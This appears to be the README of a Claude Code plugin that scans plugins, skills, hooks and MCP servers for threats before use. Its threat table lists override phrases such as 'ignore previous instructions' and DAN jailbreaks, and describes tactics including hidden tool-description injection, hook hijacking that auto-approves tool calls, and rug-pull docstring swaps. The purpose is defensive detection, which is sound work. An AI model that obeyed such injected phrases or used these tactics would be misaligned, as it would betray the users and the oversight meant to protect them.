Scans plugins, skills, hooks, and MCP servers for security threats before use. Detects prompt injection, data exfiltration, credential theft, obfuscation, and more.
Export a plugin security scan report as formatted markdown
Export a plugin scan report in SARIF 2.1.0 format for CI/IDE integration
Safely install a plugin with pre-installation security scanning
Scan all installed plugins and marketplace plugins for security threats
Scan only changed files in a plugin for new security threats
Executes bash commands
Hook triggers when Bash tool is used
Modifies files
Hook triggers on file write and edit operations
Runs pre-commands
Contains inline bash commands via ! syntax
Bash prerequisite issue
Uses bash pre-commands but Bash not in allowed tools
Security scanner plugin for Claude Code. Scans plugins, skills, hooks, and MCP servers for threats before you use them.
Agents using Claude Code can be compromised through malicious plugins — prompt injection in tool descriptions, data exfiltration via webhooks, credential theft from environment variables, and obfuscated payloads. Per Snyk's ToxicSkills study, 36% of agent skills have at least one security flaw. MCP Scanner detects these threats using static analysis combined with Claude's semantic analysis.
```bash
git clone https://github.com/digitaltitann/mcp-scanner ~/.claude/plugins/mcp-scanner
```
On Windows:
```powershell
git clone https://github.com/digitaltitann/mcp-scanner $env:USERPROFILE\.claude\plugins\mcp-scanner
```
No dependencies required — Python stdlib only.
```
/scan-plugin ~/.claude/plugins/some-plugin
```
Or ask naturally: "Is this plugin safe?"
```
/scan-all
/scan-mcp
/install-plugin https://github.com/user/some-plugin
/export-report ~/.claude/plugins/some-plugin
/scan-diff ~/.claude/plugins/some-plugin
/scan-diff ~/.claude/plugins/some-plugin --since HEAD~1
/scan-remote user/plugin-repo
/scan-remote https://github.com/user/plugin-repo --branch dev
```
Requires the gh CLI to be installed and authenticated.
```
/scan-history --show
/scan-history --trends
/scan-history --stats
```
```
/scan-permissions ~/.claude/plugins/some-plugin
/scan-permissions --all
```
Shows what each plugin can access: hooks, network, env vars, filesystem, subprocesses.
```
/export-sarif ~/.claude/plugins/some-plugin -o report.sarif
```
SARIF 2.1.0 output works with GitHub Code Scanning, VS Code SARIF Viewer, and CI pipelines.
81 built-in signatures across 11 threat categories (expandable to 145+ with the community signature feed):
| Category | Examples |
|---|---|
| Prompt Injection | "ignore previous instructions", `<IMPORTANT>` tag injection, "MANDATORY: ALWAYS CALL", DAN jailbreaks |
| Data Exfiltration | requests.post with env vars, fetch() + POST, DNS exfiltration, clipboard access |
| Code Execution | eval(), exec(), subprocess(shell=True), child_process.exec() |
| Credential Theft | os.environ["API_KEY"], SSH key access, bulk env var dumps, suspicious env var names |
| Known Malicious | 7 fingerprinted attack tools from security research (promptfoo, Invariant Labs, DVMCP) |
| Network Abuse | HTTP instead of HTTPS, hardcoded IPs, connections to webhook.site/pastebin/ngrok |
| Obfuscation | base64 decode + exec, hex-encoded payloads, String.fromCharCode chains |
| File System Abuse | directory traversal, symlink attacks, .bashrc modification, crontab creation |
| Over-Broad Permissions | allowed-tools: *, wildcard MCP tools |
| Hook Hijacking | auto-approving tool calls, modifying tool inputs, session tracking |
| Rug Pull Detection | runtime docstring swaps, trigger file checks for delayed activation |
Two-phase scanning:

1. Static analysis: a Python regex scanner runs fast pattern matching across all files. It checks line-by-line patterns, multi-line patterns, MCP configs, hook configs, file structure, known malicious signatures, and dependencies.
2. Semantic analysis: Claude reads flagged files and performs deeper analysis that regex can't do: context-dependent risk assessment, indirect prompt injection, combined pattern escalation (credential access + network call = CRITICAL).
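
The sketch below is an added example, not code from the mcp-scanner repository. It shows a line-by-line regex pass followed by the combined-pattern escalation described above (credential access + network call = CRITICAL). The signatures, severity names, and sample plugin files are all constructed assumptions.

```python
import re

# Constructed signatures and severity names (assumptions, not the plugin's rules).
SIGNATURES = [
    ("prompt_injection", "HIGH", re.compile(r"ignore (all )?previous instructions", re.I)),
    ("credential_access", "MEDIUM", re.compile(r"os\.environ\[[\"'][A-Z_]*(KEY|TOKEN|SECRET)")),
    ("network_call", "MEDIUM", re.compile(r"requests\.post\(|urlopen\(")),
    ("code_execution", "HIGH", re.compile(r"\b(eval|exec)\(|shell\s*=\s*True")),
]
ORDER = ["NONE", "LOW", "MEDIUM", "HIGH", "CRITICAL"]
EXFIL_PAIR = {"credential_access", "network_call"}

def scan_text(path, text):
    """Line-by-line pass: one finding per (line, signature) match."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for category, severity, pattern in SIGNATURES:
            if pattern.search(line):
                findings.append({"file": path, "line": lineno,
                                 "category": category, "severity": severity})
    return findings

def escalate(findings):
    """Raise both halves of a credential-read + network-send pair found in
    the same file to CRITICAL; either one alone keeps its own severity."""
    cats_by_file = {}
    for f in findings:
        cats_by_file.setdefault(f["file"], set()).add(f["category"])
    for f in findings:
        if EXFIL_PAIR <= cats_by_file[f["file"]] and f["category"] in EXFIL_PAIR:
            f["severity"] = "CRITICAL"
    return findings

def overall_risk(findings):
    """Highest severity among the findings, or NONE for a clean file."""
    return max((f["severity"] for f in findings), key=ORDER.index, default="NONE")

# Constructed sample plugin files (string data only, never executed).
READS_KEY = 'import os\nkey = os.environ["API_KEY"]\nclient = make_client(key)\n'
READS_AND_SENDS = ('import os, requests\n'
                   'key = os.environ["API_KEY"]\n'
                   'requests.post("https://example.invalid/hook", data=key)\n')

if __name__ == "__main__":
    for name, src in [("reads_key.py", READS_KEY), ("reads_and_sends.py", READS_AND_SENDS)]:
        found = escalate(scan_text(name, src))
        print(name, overall_risk(found), [(f["line"], f["category"]) for f in found])
```

The file that only reads a key stays at MEDIUM, which is the kind of context-dependent case a regex pass cannot settle on its own.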
Risk levels:
Three layers of ongoing protection:
Automatically runs at every Claude Code session start. Checksums all installed plugins and compares against a stored baseline. If any plugin is new or has changed files, runs the scanner and warns you.
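
An added example of the checksum-and-baseline comparison described above, not the plugin's own implementation. The digest scheme, the function names, the choice to skip `.git`, and the temporary plugin tree are assumptions made for illustration.

```python
import hashlib, json, os, tempfile

def plugin_digest(plugin_dir):
    """SHA-256 over relative paths and file contents, in sorted order."""
    h = hashlib.sha256()
    for root, dirs, files in os.walk(plugin_dir):
        # Assumption: skip VCS metadata, which changes on every fetch.
        dirs[:] = sorted(d for d in dirs if d != ".git")
        for name in sorted(files):
            full = os.path.join(root, name)
            rel = os.path.relpath(full, plugin_dir).replace(os.sep, "/")
            h.update(rel.encode() + b"\0")  # renames change the digest too
            with open(full, "rb") as fh:
                h.update(hashlib.sha256(fh.read()).digest())
    return h.hexdigest()

def snapshot(plugins_root):
    """Map each installed plugin directory to its digest."""
    return {name: plugin_digest(os.path.join(plugins_root, name))
            for name in sorted(os.listdir(plugins_root))
            if os.path.isdir(os.path.join(plugins_root, name))}

def diff_baseline(baseline, current):
    """Plugins that need a scan: new ones and ones whose digest changed."""
    new = sorted(set(current) - set(baseline))
    changed = sorted(n for n in current if n in baseline and current[n] != baseline[n])
    return new, changed

def demo():
    """Constructed plugin tree in a temp dir: edit one plugin, add another."""
    with tempfile.TemporaryDirectory() as root:
        def write(rel, text):
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w") as fh:
                fh.write(text)
        write("alpha/hooks/hooks.json", "{}")
        write("beta/SKILL.md", "# beta\n")
        baseline = json.loads(json.dumps(snapshot(root)))  # round-trip as if stored
        write("alpha/hooks/hooks.json", '{"PreToolUse": []}')
        write("gamma/SKILL.md", "# gamma\n")
        return diff_baseline(baseline, snapshot(root))

if __name__ == "__main__":
    print(demo())
```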
Scheduled full scan of all plugins with JSON reports.
```bash
# Install as daily scheduled task (Windows, runs at 8 AM)
python ~/.claude/plugins/mcp-scanner/scripts/daily_scan.py --install
# Run manually
python ~/.claude/plugins/mcp-scanner/scripts/daily_scan.py
# Remove scheduled task
python ~/.claude/plugins/mcp-scanner/scripts/daily_scan.py --uninstall
```
Reports are saved to ~/.claude/mcp-scanner-reports/scan-YYYY-MM-DD.json with 30-day retention.
npx claudepluginhub digitaltitann/mcp-scanner